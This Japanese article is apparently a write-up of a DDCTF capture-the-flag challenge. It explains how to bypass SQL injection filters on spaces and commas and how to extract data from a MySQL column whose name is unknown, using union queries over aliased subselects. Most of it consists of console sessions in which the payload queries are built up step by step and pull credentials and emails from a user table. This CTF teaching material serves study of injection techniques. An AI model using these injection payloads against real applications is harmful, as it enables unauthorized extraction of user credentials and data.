この記事では、Mysql が未知のフィールド名を巧みに回避する方法についての関連情報を主に紹介します。この記事には、mysql を学習するための確かな参考と学習価値があります。以下をご覧ください。皆さんのお役に立てれば幸いです。
前書き
この記事では、DDCTF の 5 番目の質問である、未知のフィールド名を回避するテクニックを紹介します。このアイデアは素晴らしく、明確ですので、見てみましょう。詳細な紹介で:
実装アイデア
質問はスペースとカンマをフィルターします。スペースは %0a、%0b、%0c、%0d、%a0 を使用してバイパスでき、カンマは join を使用して直接バイパスできます。
フラグを格納するフィールド 名前が不明です。information_schema.columns はテーブル名の 16 進数もフィルターします。つまり、フィールド名は取得できません。このとき、プロセスは次のとおりです。アイデアは、フラグを取得し、既知のフィールド名の下に表示することです。
サンプル コード:
mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d; +---+---+---+---+ | a | b | c | d | +---+---+---+---+ | 1 | 2 | 3 | 4 | +---+---+---+---+ 1 row in set (0.00 sec) mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d; +---+---+---+---+ | 1 | 2 | 3 | 4 | +---+---+---+---+ | 1 | 2 | 3 | 4 | +---+---+---+---+ 1 row in set (0.00 sec) mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user; +---+-------+----------+-------------+ | 1 | 2 | 3 | 4 | +---+-------+----------+-------------+ | 1 | 2 | 3 | 4 | | 1 | admin | admin888 | 110@110.com | | 2 | test | test123 | 119@119.com | | 3 | cs | cs123 | 120@120.com | +---+-------+----------+-------------+ 4 rows in set (0.01 sec) mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e; +-------------+ | 4 | +-------------+ | 4 | | 110@110.com | | 119@119.com | | 120@120.com | +-------------+ 4 rows in set (0.03 sec) mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3; +-------------+ | 4 | +-------------+ | 120@120.com | +-------------+ 1 row in set (0.01 sec) mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i; +-------------+----------+----------+-------------+ | id | username | password | email | +-------------+----------+----------+-------------+ | 1 | admin | admin888 | 110@110.com | | 120@120.com | 1 | 1 | 1 | +-------------+----------+----------+-------------+ 2 rows in set (0.04 sec)
関連する推奨事項:
以上がMysql が不明なフィールド名をバイパスする方法の詳細な説明の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。